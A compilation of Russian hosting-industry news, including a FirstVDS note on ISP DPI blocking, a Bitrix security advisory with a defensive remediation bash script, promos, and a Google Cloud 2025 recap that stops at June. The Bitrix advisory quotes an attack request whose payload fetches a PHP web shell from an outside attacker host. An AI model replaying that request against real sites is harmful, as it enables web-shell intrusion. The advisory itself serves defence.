В последние недели мы фиксируем рост числа обращений от пользователей, которые испытывают сложности с доступом к Личному кабинету my.firstvds.ru

Проблема проявляется у некоторых абонентов разных интернет-провайдеров, включая мобильные, домашние и корпоративные сети, независимо от типа устройства или операционной системы.

Наши системы мониторинга и журналы доступа показывают, что инфраструктура сервиса работает штатно. Сбоев или ограничений на стороне FirstVDS не зафиксировано.

В чём может быть проблема
Мы проанализировали обращения и характерные сетевые симптомы и определили, что ограничения могут возникать из-за работы внешних систем фильтрации трафика, которые используют некоторые операторы связи.

В ряде случаев блокировка происходит не по IP-адресу ресурса, а на основании анализа сетевого трафика. На оборудовании глубокой инспекции пакетов (DPI) анализ может выполняться внутри зашифрованных HTTPS / SSL / TLS-сессий, в том числе по признакам, характерным для протоколов или туннелей, мимикрирующих под обычный HTTPS-трафик.

Ограничения могут проявляться в виде:

• обрывов TLS-соединения на этапе установки сессии;
• отсутствия ответа сервера после отправки Client Hello;
• длительных таймаутов без установления защищённого соединения.

Данное поведение не связано с работоспособностью сервиса, серверной инфраструктуры или сетевых ресурсов компании и находится вне зоны нашего контроля.

Для быстрой проверки рекомендуем:

• открыть Личный кабинет, используя мобильный интернет другого оператора;
• подключиться к другой сети (например, к домашнему Wi-Fi вместо корпоративного);
• проверить доступ с другого устройства.

При смене интернет-провайдера, типа подключения или маршрута передачи данных меняются сетевые параметры соединения. В результате трафик может перестать подпадать под правила фильтрации, и доступ к сервису восстанавливается.

Если вы наблюдаете данные симптомы, то это подтверждает, что проблема на уровне фильтрации вашего интернет-провайдера.

Что можно сделать сейчас
В качестве временных решений рекомендуем:

• Использовать альтернативное подключение, если есть такая возможность.
• Обратиться в техническую поддержку вашего провайдера и сообщить о проблеме. Обращения позволяют операторам быстрее выявлять и устранять подобные ошибки фильтрации.

Пример обращения к провайдеру:
Прошу зарегистрировать инцидент: отсутствует доступ к ресурсу my.firstvds.ru. Сайт открывается через сети других операторов, но недоступен через вашу сеть. Прошу проверить корректность фильтрации и маршрутизации трафика до указанного ресурса.

Что делаем мы
Мы фиксируем все обращения, связанные с проблемами доступа в Личный кабинет, анализируем сетевые симптомы и взаимодействуем с профильными организациями, чтобы в будущем исключить проблемы. Спасибо за понимание.

Если вы хотите помочь нам быстрее разобраться в ситуации
При обращении в поддержку, пожалуйста, по возможности частично или полностью укажите следующую информацию:
Регион и город, из которого осуществляется подключение.
Интернет-провайдер (название компании).
Тип подключения:

• мобильный интернет,
• домашний интернет,
• корпоративная сеть.

Внешний IP-адрес вашего подключения
(его можно определить на сайтах 2ip.ru или myip.ru).
Какие ресурсы недоступны:

• Личный кабинет (my.firstvds.ru),
• основной сайт
• другие сервисы FirstVDS

Меняется ли ситуация при подключении через другую сеть
(например, мобильный интернет вместо Wi-Fi, VPN).
Примерное время и дата, когда проблема наблюдалась.
Результат MTR до my.firstvds.ru (если есть возможность)

Обратите внимание:

• ICMP-запросы к биллингу могут быть недоступны — это нормально;
• для диагностики предпочтительно использовать TCP MTR на порт 443;
• если MTR обрывается или показывает потери на промежуточных узлах — это также полезная информация.

Если Личный кабинет для создания тикета недоступен, воспользуйтесь чатом на сайте.

Открываем новую площадку в Амстердаме — Qupra DC2.

Qupra — надёжный оператор с 30-летним опытом работы. ЦОД спроектирован в соответствии с высокими стандартами безопасности, оснащён резервированными системами электроснабжения и кондиционирования. Подробнее о преимуществах новой площадки рассказали здесь.

Все серверы, расположенные в euNetworks, перенесли в новый дата-центр. Миграция прошла бесшовно: стоимость аренды серверов не изменилась, а все услуги работают в штатном режиме.

За последнюю неделю наша техническая поддержка фиксирует участившиеся попытки несанкционированно регистрировать новых пользователей через демо-компоненты 1С-Битрикс.

Что такое «демо-компоненты». Это тестовый набор информации (пользователи, товары, статьи), который система устанавливает «из коробки», чтобы сразу показать свои возможности. Вендор требует удалять все установочные и демо-компоненты, внимательно настраивать опции самостоятельной регистрации пользователей при запуске реального сайта.

Впервые о проблеме заговорили более двух лет назад. Некорректная настройка системы позволяет злоумышленнику зарегистрироваться на сайте под видом обычного пользователя, даже если администратор полностью отключил публичную регистрацию в настройках. Это происходит из-за неудаленной демо-формы с возможностью самостоятельной регистрации пользователя.

Если в вашей админ-панели постоянно добавляются пользователи с логином bitrixsupport_, возможно, ваш проект настроен неправильно.

Как это работает
Злоумышленник пользуется тем, что администратор не отключил самостоятельную регистрацию пользователей. Он создаёт фейковые учётные записи с именами, начинающимися на bitrixsupport_, чтобы маскировать их под технические. А затем использует их для создания избыточной нагрузки. Проблема временно устраняется только после полной перезагрузки сервера или веб-сервера.

После успешной регистрации пользователи bitrixsupport_ выполняют запросы вида:

POST /bitrix/tools/landing/ajax.php?action=Site::uploadFile

с нагрузкой

data[picture]=http://sql.bling.org/bx/<ваш_домен>.<ru>_xx/.description.php

в попытке загрузить php-шелл на сервер.

Нам попадались случаи, где такой запрос провоцировал DOS, но это не приводило к загрузке веб-шелла.

Попытка выполнения запроса от пользователя без регистрации приводит к ошибке «Недостаточно прав», и такое соединение сразу же закрывается в отличие от запросов пользователей bitrixsupport_.

DOS-атака может задевать apache веб-сервер, тогда сайт начинает отдавать 504 ошибку (Gateway Timeout) или MySQL начинает отдавать ошибку Error 1040: Too Many Connections.

Что нужно сделать
Удалите ненужных пользователей с префиксом bitrixsupport_.
Запомните: «1С-Битрикс» никогда не создает на ваших сайтах или в Битрикс24 неизвестные учётные записи. Такие аккаунты могут появиться только по вашей инициативе или в результате действий злоумышленника.

Как удалить. Перейдите в административную панель 1С-Битрикс по адресу:

/bitrix/admin/user_admin.php

Найдите и удалите всех пользователей с префиксом bitrixsupport_— это не системные аккаунты, они не нужны и небезопасны.

Обновите 1С-Битрикс до последней версии.
Выполните перезапуск сервера или веб-сервера Apache/Nginx, чтобы очистить соединения и завершить сессии.
Для дополнительной безопасности ограничьте доступ к формам регистрации.
Для автоматизации администратор может использовать скрипт, который сделает всё автоматически.

#!/bin/bash

# Bitrix Reg Security Fix v.0.0.5 beta - защита от уязвимости регистрации
# 1. .htaccess - блокирует регистрацию пользовталей в ядре 1С Битрикс через демо-скрипты Bitrix
# 2. MySQL - удаляет пользователей bitrixsupport_* с подтверждением
# 3. nginx - блокирует все ?register=yes запросы с подтверждением
#            может сломать некоторые скрипты на сайте
#            перед использованием нужно проконсультироваться с разработчиком
#
# Автоматически определяет Bitrix Env, Docker, ISP Manager, проверяет nginx синтаксис до и после правок
# Применение скрипта на свой страх и риск
#
# Дебаг
# set -x -v

red="$(tput setaf 1)$(tput bold)"
green="$(tput setaf 2)$(tput bold)"
reset="$(tput sgr0)"

# show script version
self_current_version="Bitrix Reg Security Fix v.0.0.5 beta"
printf "\n${green}$self_current_version\n${reset}"

# check privileges
if [[ $EUID -ne 0 ]]; then
	printf "\n${red}ERROR${reset} - This script must be run as root" 
	exit 1
fi

# one instance run lock
LOCKFILE=/tmp/bitrix_reg_fix.lock
exec 9>$LOCKFILE

if ! flock -n 9; then
    echo
    if command -v lsof >/dev/null 2>&1; then
        PID=$(lsof -t "$LOCKFILE" 2>/dev/null | grep -v "^$$\$" | head -n1)
        printf "%s is ${red}already locked${reset} by PID %s\n\n" "$LOCKFILE" "$PID"
    elif command -v fuser >/dev/null 2>&1; then
        PID=$(fuser "$LOCKFILE" 2>/dev/null | tr ' ' '\n' | grep -v "^$$\$" | head -n1)
        printf "%s is ${red}already locked${reset} by PID %s\n\n" "$LOCKFILE" "$PID"
    else
        printf "%s ${red}already exists${reset}\n\nInstall 'lsof -t' or 'fuser' to see the PID.\n" "$LOCKFILE"
    fi
    exit 1
fi

trap 'exec 9>&-; rm -f "$LOCKFILE"' EXIT

bitrix_fix_reg_paths () {
    echo
    if ! command -v nginx &> /dev/null; then
        echo "${red}ERROR.${reset} Nginx was not found"
        return 1
    fi

    echo "${green}Checking nginx paths${reset}" && echo

    htaccess_directives=("Order allow,deny" "Deny from all")
    
    # Define relative paths to check/create .htaccess files
    rel_paths=(bitrix/wizards/bitrix/demo/public_files/ru/auth/.htaccess \
               bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/custom-registration/.htaccess \
               bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/my-components/.htaccess \
               bitrix/wizards/bitrix/demo/modules/subscribe/public/personal/subscribe/.htaccess \
               install/wizards/bitrix/infoportal/site/public/ru/personal/profile/.htaccess \
               install/wizards/bitrix/infoportal/site/public/ru/board/my/.htaccess)
    
    # Find all nginx root directives (standard root)
    mapfile -t roots < <(grep -RhoP '^\s*root\s+"?\K[^";]+' /etc/nginx | tr -d '"' | sort -u)
    
    # Find all nginx root_path directives (set $root_path)
    mapfile -t root_paths < <(grep -RiIn "root_path " /etc/nginx | grep -oP 'set \$\w+\s+\K[^;]+' | tr -d ';' | tr -d '"' | sort -u)
    
    # Combine both types of paths
    all_paths=("${roots[@]}" "${root_paths[@]}")
    
    # Remove duplicates while preserving order
    declare -A seen
    unique_paths=()
    for path in "${all_paths[@]}"; do
        if [[ ! "${seen[$path]}" ]]; then
            seen["$path"]=1
            unique_paths+=("$path")
        fi
    done
    
    targets=()
    
    for root in "${unique_paths[@]}"
    do
        # Clean up path (remove trailing spaces/special characters)
        root=$(echo "$root" | xargs)
        
        for rel in "${rel_paths[@]}"
        do
            f="$root/$rel"
            d="$(dirname "$f")"
            
            # Check if directory exists
            if [ -d "$d" ]; then
                if [ -f "$f" ]; then
                    all_directives_exist=true
                    for directive in "${htaccess_directives[@]}"; do
                        if ! grep -q "^[[:space:]]*$directive" "$f"; then
                            all_directives_exist=false
                            break
                        fi
                    done
                    
                    if [ "$all_directives_exist" = false ]; then
                        printf '[DRY-RUN] would update: %s %s(file exists and will be updated)%s\n' "$f" "$green" "$reset"
                        targets+=("$f")
                    fi
                else
                    printf '[DRY-RUN] would create: %s %s(not exist, will be created)%s\n' "$f" "$green" "$reset"
                    targets+=("$f")
                fi
            fi
        done
    done
    
    [ "${#targets[@]}" -ne 0 ] && {
        printf '\nApply changes? [Y/n]: '
        read -r ans
        case "${ans:-Y}" in
            Y | y)
                for f in "${targets[@]}"
                do
                    if [ -f "$f" ]; then
                        temp_file="$(mktemp)"
                        printf "Order allow,deny\nDeny from all\n\n" > "$temp_file"
                        \cat "$f" >> "$temp_file"
                        temp_result="$(mktemp)"
                        \head -n 2 "$temp_file" > "$temp_result"
                        \tail -n +3 "$temp_file" | \
                        \grep -v "^[[:space:]]*Order allow,deny$" | \
                        \grep -v "^[[:space:]]*Deny from all$" >> "$temp_result"
                        \mv -f "$temp_result" "$f"
                        \rm -f "$temp_file"
                        printf '[OK] updated: %s\n' "$f"
                    else
                        mkdir -p "$(dirname "$f")"
                        printf "Order allow,deny\nDeny from all\n\n" > "$f"
                        printf '[OK] created: %s\n' "$f"
                    fi
                done
            ;;
            *)
                printf 'Aborted\n'
            ;;
        esac
    } || printf "${green}No Bitrix paths found in nginx that need updating${reset}\n"
}

mysql_all_db_del_bitrixsupport () {
	echo

	found_any=0
	mysql_accessible=0

	check_mysql_connection() {
		local container_id="$1"
		if [[ -n "$container_id" ]]; then
			docker exec "$container_id" mysql -e "SELECT 1;" &>/dev/null
		else
			mysql -e "SELECT 1;" &>/dev/null
		fi
	}

	process_deletion_confirm() {
		local db="$1"
		local container_id="$2"
		local container_image="$3"

		echo -e "${red}Found bitrixsupport_% users${reset}\nDatabase: $db\nContainer: ${container_image:-local} (${container_id:-host})\n"

		if [[ -n "$container_id" ]]; then
			docker exec "$container_id" mysql -e \
			"USE $db; SELECT ID,LOGIN,DATE_REGISTER FROM b_user WHERE LOGIN LIKE 'bitrixsupport_%';" | column -t 2>/dev/null
		else
			mysql -e \
			"USE $db; SELECT ID,LOGIN,DATE_REGISTER FROM b_user WHERE LOGIN LIKE 'bitrixsupport_%';" | column -t 2>/dev/null
		fi

		echo
		read -r -p "Delete these users from $db? [Y/n] " yn </dev/tty
		yn=${yn:-Y}

		if [[ "$yn" =~ ^[Yy]$ ]]; then
			if [[ -n "$container_id" ]]; then
				docker exec "$container_id" mysql -N -e \
				"USE $db; DELETE FROM b_user WHERE LOGIN LIKE 'bitrixsupport_%';" 2>/dev/null
			else
				mysql -N -e \
				"USE $db; DELETE FROM b_user WHERE LOGIN LIKE 'bitrixsupport_%';" 2>/dev/null
			fi

			if [[ -n "$container_id" ]]; then
				remaining=$(docker exec "$container_id" mysql -N -e \
				"USE $db; SELECT COUNT(*) FROM b_user WHERE LOGIN LIKE 'bitrixsupport_%';" 2>/dev/null)
			else
				remaining=$(mysql -N -e \
				"USE $db; SELECT COUNT(*) FROM b_user WHERE LOGIN LIKE 'bitrixsupport_%';" 2>/dev/null)
			fi

			if [[ "$remaining" -eq 0 ]]; then
				echo -e "${green}No remaining bitrixsupport_% users in ${container_image:-local} $db (${container_id:-host})${reset}"
				echo
			else
				echo -e "${red}Users still exist in $db${reset}"
				echo
			fi
		else
			echo "Skipping deletion for bitrixsupport_% users in ${container_image:-local} $db (${container_id:-host})"
			echo
		fi
	}

	# Docker MySQL
	if command -v docker &>/dev/null; then
		while read -r id image; do
			echo "$image" | grep -qiE 'percona|mysql|mariadb' || continue

			check_mysql_connection "$id" || {
				echo "${red}ERROR.${reset} Cannot connect to MySQL in container $image ($id)"
				continue
			}

			mysql_accessible=1

			dbs=$(docker exec "$id" mysql -N -e "SHOW DATABASES" 2>/dev/null | \
			      grep -Ev '^(information_schema|performance_schema|mysql|sys)')

			while read -r db; do
				[[ -z "$db" ]] && continue

				docker exec "$id" mysql -N -e \
				"USE $db; SHOW TABLES LIKE 'b_user';" 2>/dev/null | grep -q b_user || continue

				users=$(docker exec "$id" mysql -N -e \
				"USE $db; SELECT COUNT(*) FROM b_user WHERE LOGIN LIKE 'bitrixsupport_%';" 2>/dev/null)

				if [[ "$users" -gt 0 ]]; then
					found_any=1
					process_deletion_confirm "$db" "$id" "$image"
				fi
			done <<< "$dbs"
		done < <(docker ps --format '{{.ID}} {{.Image}}')
	fi

	# Local MySQL
	if command -v mysql &>/dev/null; then
		check_mysql_connection "" || {
			echo "${red}ERROR.${reset} Cannot connect to local MySQL"
			return
		}

		mysql_accessible=1
		dbs=$(mysql -N -e "SHOW DATABASES" 2>/dev/null | \
		      grep -Ev '^(information_schema|performance_schema|mysql|sys)')

		while read -r db; do
			[[ -z "$db" ]] && continue

			mysql -N -e "USE $db; SHOW TABLES LIKE 'b_user';" 2>/dev/null | grep -q b_user || continue

			users=$(mysql -N -e \
			"USE $db; SELECT COUNT(*) FROM b_user WHERE LOGIN LIKE 'bitrixsupport_%';" 2>/dev/null)

			if [[ "$users" -gt 0 ]]; then
				found_any=1
				process_deletion_confirm "$db" "" ""
			fi
		done <<< "$dbs"
	fi

	[[ $found_any -eq 0 && $mysql_accessible -eq 1 ]] && \
	echo -e "${green}Users like bitrixsupport_% were not found in any MySQL DBs${reset}"
}

block_all_register_in_nginx () {
    echo
    CONF_FILE="/etc/nginx/bx/conf/bitrix.conf"
    DENY_CODE='# Deny 1C site user registration \nif ($arg_register = "yes") {\n  return 403;\n}\n'
    MGR_BIN="/usr/local/mgr5/sbin/mgrctl"
    
    function check_nginx ()
    {
        nginx -t &> /dev/null
    }
    
    function apply_fix ()
    {
        local target_file="$1" config_type="$2"
        
        # Check if fix already applied
        grep -Eq '^[[:space:]]*if[[:space:]]*\(\$arg_register[[:space:]]*=[[:space:]]*"yes"\)' "$target_file" 2> /dev/null && {
            echo "${green}\"?register=yes\" URL arguments already blocked in $target_file${reset}"
            return 0
        }
        
        echo "${red}DANGEROUS. Check with the developer first${reset}"
        read -rp "Block all \"?register=yes\" URL arguments globally in nginx? [y/N]: " answer
        answer=${answer:-N}
        [[ ! "$answer" =~ ^[Yy]$ ]] && return 1
        
        if [[ "$config_type" == "direct" ]]
        then
            # Direct modification of nginx config
            check_nginx || {
                echo "${red}nginx -t failed before fix${reset}"
                return 1
            }
            \cp -f "$target_file" "$target_file.bak"
            echo -e "$DENY_CODE" > "$target_file.tmp"
            cat "$target_file.bak" >> "$target_file.tmp"
            \mv -f "$target_file.tmp" "$target_file"
        else
            # Create include file for ISP Manager
            echo -e "$DENY_CODE" > "$target_file"
        fi
        
        if check_nginx && systemctl restart nginx
        then
            echo -e "${green}All \"?register=yes\" URL arguments successfully blocked in $target_file${reset}\nNginx restarted successfully"
            [[ "$config_type" == "direct" ]] && \rm -f "$target_file.bak"
            return 0
        else
            echo "${red}nginx -t failed after fix${reset}"
            [[ "$config_type" == "direct" ]] && \mv -f "$target_file.bak" "$target_file" || \rm -f "$target_file"
            check_nginx && echo "${green}Reverting success. No changes was made.${reset}" || \
                echo "${red}Nginx configtest error. Check nginx -t manually.${reset}"
            return 1
        fi
    }
    
    # Main logic: apply fix based on environment
    if [[ -f "$CONF_FILE" ]]
    then
        apply_fix "$CONF_FILE" "direct"
    else
        if [[ -x "$MGR_BIN" ]]
        then
            apply_fix "/etc/nginx/vhosts-includes/bitrix_reg_global_deny.conf" "include"
        else
            echo "${red}No /etc/nginx/bx/conf/bitrix.conf or ISP Manager were found. Cannot apply fix.${reset}"
            return 1
        fi
    fi
}

# Execute all three security fixes
bitrix_fix_reg_paths
mysql_all_db_del_bitrixsupport
block_all_register_in_nginx

Как ограничить регистрацию на демо-страницах
Если регистрация пользователей на сайте не требуется, добавьте следующий блок в начало файла /etc/nginx/bx/conf/bitrix.conf:

#Deny 1C site user registration
if ($arg_register = "yes") {
    return 403;
}

Если регистрация в целом нужна, но нужно закрыть устаревшие формы:

Добавьте файлы .htaccess со следующим содержимым:

Order allow,deny
Deny from all

Добавьте их в директории (только если они существуют):

bitrix/wizards/bitrix/demo/public_files/ru/auth/.htaccess
bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/custom-registration/.htaccess
bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/my-components/.htaccess
bitrix/wizards/bitrix/demo/modules/subscribe/public/personal/subscribe/.htaccess
install/wizards/bitrix/infoportal/site/public/ru/personal/profile/.htaccess
install/wizards/bitrix/infoportal/site/public/ru/board/my/.htaccess

Рекомендуем проверить ваш проект как можно скорее.

С 1 января 2026 года вступает в силу изменение ставки НДС. В связи с этим в пункт 4.7 договора об участии в партнерской программе внесены изменения.

Согласно новой редакции пункта 4.7:

• Российские юрлица / ИП — самостоятельно исчисляют и уплачивают НДС (если являются плательщиками);
• Иностранные юрлица / ИП — самостоятельно уплачивают налоги по законодательству своей страны. Удержание НДС и требование о сертификате резидентства отменяются;
• Физические лица — изменений нет, НДФЛ удерживается Заказчиком.

Изменения вступят в силу с 1 января 2026 года.

https://selectel.ru

Компания упростила внедрение Infrastructure as Code (IaC) для команд разработки, выпустив Terraform-провайдер. С помощью нового решения DevOps- и IT-команды могут быстрее и безопаснее управлять облачной инфраструктурой, снижая операционные риски и упрощая масштабирование сервисов в облаке.

Облачный провайдер Рег.облако представил новый инструмент в облаке, который позволяет DevOps-инженерам и другим IТ-специалистам описывать и управлять облачными серверами и их снэпшотами в виде кода, интегрируя инфраструктуру в привычные процессы разработки и CI/CD-пайплайны.
www.reg.cloud/support/cloud/instrumenty/terraform/

Провайдеры Terraform представлены в виде плагинов и позволяют взаимодействовать с API конкретной облачной платформы: быстро разворачивать и изменять инфраструктуру, поддерживать несколько идентичных сред для разработки, тестирования и продакшена, отслеживать историю изменений через систему контроля версий.

Сама инфраструктура описывается как код, что упрощает совместную работу команд и позволяет безопасно и предсказуемо вносить изменения. Включение инфраструктуры в CI/CD снижает операционные риски и делает масштабирование и обслуживание облачных ресурсов быстрее и стабильнее. Terraform автоматически создает, изменяет или удаляет ресурсы, чтобы привести инфраструктуру в соответствие с заданным описанием.

Мы видим, что бизнес всё активнее использует инфраструктуру как код, и наша задача — дать инструменты, которые позволяют безопасно и прозрачно управлять ресурсами в облаке. Клиентам больше не нужно вручную поддерживать инфраструктуру или тратить время на повторяющиеся операции. Инструмент снизит вероятность ошибок, ускорит выпуск продуктов и сделает работу команд предсказуемее

отмечает Алексей Тюняев, директор по облачным продуктам Рег.облака.

Конфигурация инфраструктуры Рег.облака описывается в файлах на языке HCL, синтаксис которого близок к YAML, или в виде JSON-файлов. Файлы можно хранить в системах контроля версий (Git), рецензировать наравне с прикладным кодом, тестировать и переиспользовать в разных проектах. Провайдер обеспечивает управление IaaS-ресурсами Рег.облака, включая облачные серверы и их снэпшоты, и может быть интегрирован в существующие DevOps- и CI/CD-процессы.

Вся команда EuroHoster сердечно поздравляет вас с наступающим Новым годом и Рождеством Христовым!

Пусть Новый год принесёт вам душевное спокойствие, уверенность в завтрашнем дне и новые возможности для личностного роста и развития ваших проектов. Желаем, чтобы все ваши идеи находили надёжную техническую опору, грамотную реализацию, стабильное развитие и рост, а каждый новый запуск был успешным и прибыльным.

Мы искренне благодарим вас за доверие, оказанное нам в уходящем году. Благодаря вам мы продолжаем развиваться, улучшать инфраструктуру, повышать надёжность наших сервисов и качество поддержки. Для нас важно быть не просто хостинг-провайдером, а надёжным технологическим партнёром для вас.

В честь наступающих праздников мы с радостью дарим вам специальный новогодний подарок:

Праздничная скидка -50% на аренду VPS по промокоду Christmas2025

Используйте промокод Christmas2025 и получите скидку -50% на первый период аренды VPS в

• Нидерландах
• Болгарии
• Нью-Джерси

• SSD Storage VPS
• High CPU VPS
• Windows VPS
• Windows SSD
• Storage VPS

Акция действует до 9 января 2026 года включительно.

Если вам потребуется помощь с выбором конфигурации VPS или переносом проекта — наша служба поддержки всегда на связи!

С тёплыми праздничными пожеланиями,
Команда EuroHoster Ltd.

https://eurohoster.org

Контент и редакционные материалы Google Cloud
В эпоху искусственного интеллекта, когда один год может казаться десятым, вас можно простить за то, что вы забыли о событиях прошлого месяца, не говоря уже о событиях января. Чтобы освежить вашу память, мы проанализировали данные о количестве читателей главных новостей о продуктах и ​​компаниях за 2025 год. И поскольку мы публикуем много отличных материалов, отражающих лидерство в отрасли, и историй успеха клиентов, мы также использовали эти данные. Вкратце: самые популярные статьи в основном совпадали с нашими крупнейшими анонсами. Но не всегда — в этом году в списке было немало неожиданных хитов. Читайте дальше, чтобы вспомнить этот грандиозный год и, возможно, открыть для себя несколько жемчужин, которые вы могли пропустить.

cloud.google.com/blog/products/gcp/top-google-cloud-blogs-2025/

Январь
2025 год начался успешно с важных новинок в области виртуальных машин, базовых инструментов для ИИ, а также инструментов как для Kubernetes, так и для специалистов по работе с данными. Мы также запустили серию статей « Как это делает Google », посвященную внутренним системам и инженерным принципам, лежащим в основе современного конвейера обнаружения угроз. Мы показали разработчикам, как начать работу с JAX, и сделали прогнозы по развитию ИИ на предстоящий год. Читатели с интересом узнали о том, как L'Oréal создала свою платформу MLOps, и о новаторской работе Deutsche Börse в области облачной финансовой торговли.

Новости о продуктах
Упростите работу разработчиков с Kubernetes с помощью KRO.
Blackwell уже здесь — новые виртуальные машины A4 на базе NVIDIA B200 теперь доступны в режиме предварительного просмотра.
Представляем Vertex AI RAG Engine: масштабируйте свой конвейер Vertex AI RAG с уверенностью.
Представляем BigQuery metastore — унифицированный сервис метаданных с поддержкой Apache Iceberg.
C4A, первый процессор Google Axion, теперь доступен в продаже с SSD-накопителем Titanium.

Лидерство в интеллектуальной сфере:

• Как это делает Google: создание высококачественной, масштабируемой и современной системы обнаружения угроз
• 2025 год и следующие главы в истории искусственного интеллекта

Истории клиентов

• Как акселератор L'Oréal Tech Accelerator создал свою комплексную платформу MLOps
• Торговля в облаке: уроки облачной торговой платформы Deutsche Börse Group

Февраль
Существуют продукты на основе ИИ, а есть продукты, усовершенствованные с помощью ИИ. В этом месяце лидер продаж, Gen AI Toolbox for Databases, относится ко второй категории. В этом месяце читатели также серьезно отнеслись к обучению: блоги о повышении квалификации, ресурсах и сертификации возглавили рейтинги. Результаты нашего партнерства с Anthropic попали в наш список самых читаемых материалов, а руководители инженерных подразделений подробно рассказали о масштабных усилиях Google по оптимизации энергопотребления систем ИИ. Руководители с удовольствием прочитали статью о том, как агенты будут раскрывать информацию в неструктурированных данных (которые составляют 90% информационных активов предприятий), и ознакомились с отрезвляющим отчетом об ИИ и киберпреступности. Во время Mobile World Congress мы увидели значительный интерес к нашей работе с лидерами телекоммуникационной отрасли, такими как Vodafone Italy и Amdocs.

Новости о продукции и компании:

• Объявляем о начале публичного бета-тестирования Gen AI Toolbox для баз данных.
• Получите сертификат Google Cloud в 2025 году — и узнайте, почему последние исследования говорят о важности этого.
• Узнайте о карьерных возможностях и квалификационных требованиях в Google Cloud в нашем новом разделе Career Dreamer.
• Анонсируем Claude 3.7 Sonnet, первую гибридную модель логического мышления от Anthropic, доступную на платформе Vertex AI.

Лидерство мнений

• Разработка устойчивого ИИ: подробный анализ эффективности TPU и выбросов на протяжении всего жизненного цикла.
• От скрытых данных к ценным выводам: как агенты искусственного интеллекта упрощают работу с данными.
• Новые отчеты об искусственном интеллекте и киберпреступности подчеркивают необходимость внедрения передовых методов обеспечения безопасности.

Истории клиентов

• Преобразование данных: как Vodafone Italy модернизировала свою архитектуру данных в облаке.
• Оптимизация сети с помощью ИИ: раскрытие потенциала 5G с Amdocs.

Март
Когда мы объявили о нашем намерении приобрести стартап в сфере кибербезопасности Wiz, это была крупнейшая сделка Google за всю историю и крупнейшая технологическая сделка года. Мы развили этот успех в области безопасности, запустив AI Protection. Мы также расширили свое присутствие в странах Северной Европы, открыв новый регион, и анонсировали открытую модель Gemma 3 на платформе Vertex AI. Тем временем мы объяснили угрозу, которую представляют для работодателей северокорейские IT-специалисты, показали читателям внутреннюю структуру файловой системы Colossus и вспомнили о том, чему мы научились за 25 лет работы в сфере создания центров обработки данных. Читателей заинтересовал подход Levi к данным и их интеграция в будущие проекты в области ИИ, а в честь фестиваля игр GDC наши партнеры по ИИ поделились новыми взглядами на «живые игры».

Новости о продукции и компании

• Google + Wiz: Укрепление безопасности мультиоблачных решений
• Представляем AI Protection: безопасность для эпохи ИИ.
• Эй, Свериге! Google Cloud запускает новый регион в Швеции
• Анонс Gemma 3 на Vertex AI.

Лидерство мнений

• Главная внутренняя угроза: северокорейские IT-специалисты.
• «Колосс под капотом»: как мы обеспечиваем производительность SSD по ценам HDD.
• 3 ключевых урока, извлеченных из 25 лет работы с крупномасштабными вычислительными системами для складских помещений.

Истории клиентов

• Безупречная стратегия работы с данными Levi's: как специально разработанный ИИ предотвращает «загонение» иконы в рамки.
• Кооперативный режим: Новые партнеры определяют будущее игр с помощью ИИ.

Апрель
В апреле состоялась Google Cloud Next, наша флагманская ежегодная конференция. От Firebase Studio, Ironwood TPUs и Google Agentspace до Vertex AI, Cloud WAN и Gemini 2.5 — сложно ограничиться лишь несколькими историями, было так много потрясающих событий (полный список можно найти в обзоре мероприятия ). Тем временем наша команда системных разработчиков обсуждала инновации для контроля теплового режима инфраструктуры центров обработки данных. А на конференции RSA мы представили наше видение агентного центра управления безопасностью будущего. Что касается клиентов, мы рассказали о стартапах, сыгравших главную роль на Next, и заглянули за кулисы «Волшебника страны Оз» в Sphere.
Новости о продукции и компании

• Представляем Firebase Studio и инструменты разработки для агентов, позволяющие создавать проекты с помощью Gemini.
• Представляем TPU-процессоры Ironwood и новые инновации в области гиперкомпьютеров с искусственным интеллектом.
• Vertex AI предлагает новые способы создания и управления многоагентными системами.
• Масштабируйте корпоративный поиск и внедрение агентов с помощью Google Agentspace.
• Облачная WAN: объедините ваше глобальное предприятие с помощью сети, созданной для эпохи искусственного интеллекта.
• Gemini 2.5 расширяет возможности логического мышления для корпоративных сценариев использования.
• Начало применения агентного ИИ в операциях по обеспечению безопасности на конференции RSAC 2025

Лидерство мнений

• Инфраструктура для ИИ находится на пике популярности. Новые системы распределения электроэнергии и жидкостного охлаждения могут этому способствовать.
• 3 новых способа использования ИИ в качестве помощника в обеспечении безопасности

Истории клиентов

• Глобальные стартапы строят будущее искусственного интеллекта на платформе Google Cloud.
• Магия искусственного интеллекта, лежащая в основе предстоящего проекта Sphere «Волшебник страны Оз».

Май
Учебный год подходил к концу, но читатели снова включились в обучение, чтобы получить сертификаты лидеров в области генеративного ИИ. Вы также были в восторге от новых моделей ИИ для работы с медиаконтентом в Vertex AI, доступности Claude Opus 4 и Claude Sonnet 4 от Anthropic. Мы также узнали, что вы очень рады использовать ИИ для генерации SQL-кода и использовать Cloud Run в качестве платформы для ваших приложений ИИ. Мы описали шаги по построению четко определенной стратегии работы с данными и показали правительствам, как ИИ может реально улучшить их уровень безопасности. А что касается клиентов, мы запустили наши обзоры «Крутые вещи, созданные клиентами» и опубликовали материалы о Формуле E и MLB.
Google Cloud объявляет о первой в своем роде сертификации лидеров в области генеративного искусственного интеллекта.
Расширение возможностей Vertex AI за счет следующей волны генеративных моделей искусственного интеллекта для работы с медиаконтентом.
Анонс Claude Opus 4 и Claude Sonnet 4 от Anthropic на Vertex AI.
Лидерство мнений

• Как научить ИИ писать качественные SQL-запросы: объяснение методов преобразования текста в SQL.
• Развертывание ИИ стало проще: развертывание в Cloud Run из AI Studio или любого клиента MCP.
• Разработка стратегии работы с данными для эпохи искусственного интеллекта.
• Как правительства могут использовать ИИ для улучшения обнаружения угроз и снижения затрат

Истории клиентов

• Крутые вещи, созданные клиентами: майский выпуск
• Расширяя границы возможностей электромобильности: Mountain Recharge в Формуле E
• Использование ИИ для создания по-настоящему персонализированных видеороликов с лучшими моментами матчей MLB: как сервис MLB My Daily Story создает такие яркие моменты.

Июнь
